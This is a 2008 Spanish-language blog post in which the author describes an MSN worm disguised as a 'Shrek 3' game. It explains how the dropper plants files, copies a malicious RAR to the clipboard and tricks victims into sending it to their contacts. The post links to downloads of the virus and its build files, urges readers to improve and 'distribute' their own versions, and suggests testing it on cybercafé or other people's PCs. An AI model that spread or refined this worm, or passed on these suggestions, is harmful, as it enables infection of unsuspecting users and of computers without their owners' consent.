2008-09-26T06:31:04.745-07:00
Éste virus simula ser el juego de Shrek 3.Lo ke hace es contaminar a los contactos del MSN de la víctima.Consiste en un archivo llamado "Shrek 3 Msn Games 2007" ke al ejecutarse livera 3 archivos:1-El archivo Shrek3_2007.rar (RAR ke contiene otro malware ke no viene al caso)Se livera en la carpeta Windows y no se ejecuta.2-El segundo archivo es el bat.bat.Se livera en la carpeta Windows y se ejecuta.3-El tercer archivo es el msn.exe.Se livera en la carpeta Windows y se ejecuta.bat.bat: éste archivo crea la carpeta system en c: ke és la ke va a alojar elarchivo ke se autoenviará a los contactos del MSN. Y lo segundo ke haceéste archivo es mover el archivo Shrek3_2007.rar a la carpeta ke acavade crear, osea c:\\system.msn.exe: éste archivo es el programake realiza las emulaciones correspondientes para copiar al clipboard(portapapeles) el archivo Shrek3_2007.rar contenido en c:\\system yautoenviarlo a los contactos del msn.Shrek3_2007.rar: RAR ke contiene un malware creado previamente. Precisamente este ->http://rapidshare.com/files/42025204..._2007.rar.htmlEn el momento ke ustedes hagan su propio virus para el MSN van a poderhacer ke se autoenvie cualkier otra cosa, incluso una copia de simismo, pero esta vez es ése malware.Funcionamiento:Lavictima ejecuta el archivo "Shrek 3 MSN Games 2007" e instantáneamentese copian 3 archivos (los anteriormente descriptos) en la carpetac:\\windows.Luego se crea la carpeta c:\\system y se mueve el archivo Shrek3_2007.rar a esa nueva carpeta.Mientras sucede lo anterior, comiensa un timer de 5 segundos, luego de pasados 5 segundos aparece el siguiente cartel:Pensemos ke ya pasaron 15 segundos, pasó más tiempo hasta ke se leyó elmensaje anterior, osea ke ya le dimos tiempo a ke se cree correctamentela carpeta c:\\system y se mueva el arhivo shrek3_2007 a ésa carpeta.Luegode apretar el boton "aceptar" del mensaje de error, comiensa una seriede emulaciones ke permiten copiar al portapapeles (clipboard) elarchivo shrek3_2007.rar ke fué movido a la carpeta c:\\system(recordemos ke estas 2 cosas son realizadas x el .bat).Teniendoya el archivo en el portapapeles, la victima se volverá a comunicar conalgun contacto y en el momento en ke presione la tecla "s" va a enviarinvoluntariamente el archivo shrek3_2007 a su contacto einstantáneamente se va a minimizar todo permitiendo de esta manera keel contacto de la víctima acepte el archivo. De esta manera, y si todosalió bien, el contacto de la víctima habrá resivido el archivo y lohabrá ejecutado contaminándose.Y pensemos ke la víctima tiene más de 1 contacto.Acáles dejo todo lo ke utilisé para realizar el virus. Desde el .s0m hastael .ico con la cara de shrek. Esto lo hago para ke puedan mejorarlo yhacer sus propios virus para "distribuir" utilizando el msn.Tambíendejo todo para ke analicen el .s0m y vean ke és lo ke hace para emularel copiado del archivo en el portapapeles, etc etc etc...UN CONSEJOAntesde ponerse a analizar y a crear sus propios virus para el MSNutilizando esta data, envien el virus a algun contacto o alguien parake vean como funxiona, o hasta podrían probarlo ustedes mismos en alguncybercafé o pc ke NO les pertenesca obviamente.Bué, de todos modos si lo prueban en sus PC simplemente finalizan el msn.exe con el administrador y problema resuelto.En ese post van a poder conocer las herramientas ke he utilizado para realizar éste virus.Acá dejo el rar ke contiene el virus, obviamente si bajan el rar no pasa nada, todo sucede al ejecutar el archivo de Shrek.DOWNOAD VIRUS ->http://rapidshare.com/files/44409961..._2007.rar[...]
No comments:
Post a Comment